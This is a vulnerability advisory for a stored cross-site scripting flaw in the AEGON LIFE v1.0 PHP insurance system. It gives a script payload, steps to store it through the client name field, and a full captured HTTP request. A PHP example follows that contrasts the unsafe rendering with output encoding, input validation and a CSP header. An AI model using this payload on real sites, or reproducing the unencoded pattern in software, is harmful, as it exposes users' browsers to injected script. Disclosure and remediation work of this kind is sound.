
Title: Aegon Life v1.0 Life Insurance Management System - Stored Cross-Site Scripting (XSS)

# Exploit Title: Life Insurance Management System - Stored Cross-Site Scripting (XSS)
# Exploit Author: Aslam Anwar Mahimkar
# Date: 18-05-2024
# Category: Web Application
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/life-insurance-management-system-system-in-php/
# Version: AEGON LIFE v1.0
# Tested on: Linux
# CVE: CVE-2024-36599
# Description:
-----------------------
A stored cross-site scripting (XSS) vulnerability in AEGON LIFE v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter of insertClient.php. The value is saved as submitted and later rendered to other users without output encoding.
# Payload:
-----------------------
<script>alert(document.domain)</script>
# Attack Vector:
-----------------------
To reproduce this vulnerability, submit <script>alert(document.domain)</script> as the name when adding a client. When any user then visits client.php, the stored script runs in their browser and the XSS is confirmed.
# Burp Suite Request:
-----------------------
POST /lims/insertClient.php HTTP/1.1
Host: localhost
Content-Length: 30423
Cache-Control: max-age=0
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMkFae0x95923Lzqh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/lims/addClient.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=V6G7SHNK1MM5VQ6I63LKLCK78N
Connection: close

------WebKitFormBoundaryMkFae0x95923Lzqh
Content-Disposition: form-data; name="client_id"

1716051159
------WebKitFormBoundaryMkFae0x95923Lzqh
Content-Disposition: form-data; name="client_password"

password
------WebKitFormBoundaryMkFae0x95923Lzqh
Content-Disposition: form-data; name="name"

<script>alert(document.domain)</script>
------WebKitFormBoundaryMkFae0x95923Lzqh
Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"
Content-Type: application/octet-stream

ÿØÿà
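
The root cause described above is a client name that is stored exactly as submitted and then written into client.php without HTML encoding. The following PHP is an added example for defenders; it is not code from AEGON LIFE v1.0 or from the advisory author, and the function names, the `h()` helper and the array layout of a client record are assumptions used for illustration. It shows the unsafe rendering pattern next to a hardened version that encodes on output and, as defence in depth, restricts what is accepted on input.

```php
<?php
// Added example, not code from AEGON LIFE v1.0. Function names and the
// shape of the $client record are assumptions used for illustration only.

// Vulnerable pattern: the stored value is concatenated straight into HTML,
// so a name containing <script>...</script> is executed in every viewer's
// browser each time the client list is rendered.
function renderClientRowUnsafe(array $client): string
{
    return '<tr><td>' . $client['client_id'] . '</td><td>' . $client['name'] . '</td></tr>';
}

// Hardened output: every untrusted value is HTML-encoded at the exact point
// where it is written into the page. ENT_QUOTES also encodes ' and " so the
// same helper is safe inside attribute values, not only in text nodes.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderClientRow(array $client): string
{
    return '<tr><td>' . h((string) $client['client_id']) . '</td><td>' . h($client['name']) . '</td></tr>';
}

// Defence in depth on input: reject values that cannot plausibly be a person's
// name before they are stored. This does not replace output encoding; it only
// limits what reaches the database in the first place.
function validateClientName(string $name): ?string
{
    $name = trim($name);
    if ($name === '' || mb_strlen($name, 'UTF-8') > 100) {
        return null;
    }
    // Letters and combining marks from any script, spaces, apostrophes,
    // hyphens and dots; angle brackets, quotes and slashes are not allowed.
    if (!preg_match('/^[\p{L}\p{M} .\'\-]+$/u', $name)) {
        return null;
    }
    return $name;
}

// A restrictive Content-Security-Policy is a further layer: even if an
// encoding bug slips through, inline script is blocked by the browser.
function sendCspHeader(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");
}

// Constructed sample record holding the kind of value the advisory describes.
$stored = [
    'client_id' => 1716051159,
    'name'      => '<script>alert(document.domain)</script>',
];

echo renderClientRowUnsafe($stored), PHP_EOL; // script tag reaches the browser intact
echo renderClientRow($stored), PHP_EOL;       // &lt;script&gt;...&lt;/script&gt; shown as text

var_dump(validateClientName($stored['name']));    // NULL: rejected on input
var_dump(validateClientName("Mary-Jane O'Neil")); // string(16): accepted
```

Run it with `php example.php`. The first echo shows the stored tag passing through unchanged, which is the behaviour the advisory reports; the second shows the same record rendered harmlessly once every untrusted value goes through `h()`. Encoding at output time is the fix that actually closes the issue, because it protects every page that displays the name, including ones written later; the input validation and CSP header reduce impact if a future template forgets to call `h()`.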